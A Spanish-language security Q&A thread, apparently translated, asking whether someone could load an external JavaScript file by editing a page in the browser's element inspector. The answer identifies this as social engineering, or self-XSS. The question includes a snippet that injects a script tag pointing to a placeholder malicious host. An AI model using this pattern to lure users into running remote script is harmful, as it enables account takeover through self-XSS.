¿Es posible cargar un script JS externo a través de la función "inspeccionar elementos"?

Navega tus respuestas
1
  1. Abrir elemento de inspección

  2. Haga clic con el botón derecho en la etiqueta del cuerpo, o donde sea, luego edite como HTML como este: 

    <button onclick="loadScript();">;Click to load external script.</button>
<script>
function loadScript() {
    var script = document.createElement('script');

    script.setAttribute('type', 'text/javascript');
    script.setAttribute('src', 'http://malicious-website/malicious-script.js');
    document.head.appendChild(script);
}
</script>

Entonces, ¿es posible este tipo de ataque?

    
pregunta mzcoxfde 02.10.2016 - 13:05
fuente

1 respuesta

3

Lo categorizaría como "ingeniería social"; Alguien le dice a los terceros que lo hagan con sus devtools. Y sí, es un posible vector de ataque.

A menudo se le advierte cuando abre las herramientas F12 en, por ejemplo, facebook, por ejemplo

desde(alemán)facebook.

Lollaman Self XSS

    
respondido por el Thomas Junk 02.10.2016 - 15:32
fuente

Lea otras preguntas en las etiquetas

Spytechphone - iPhone ¿Cómo aseguro un valor nonce dentro de la aplicación cuyo código fuente es público?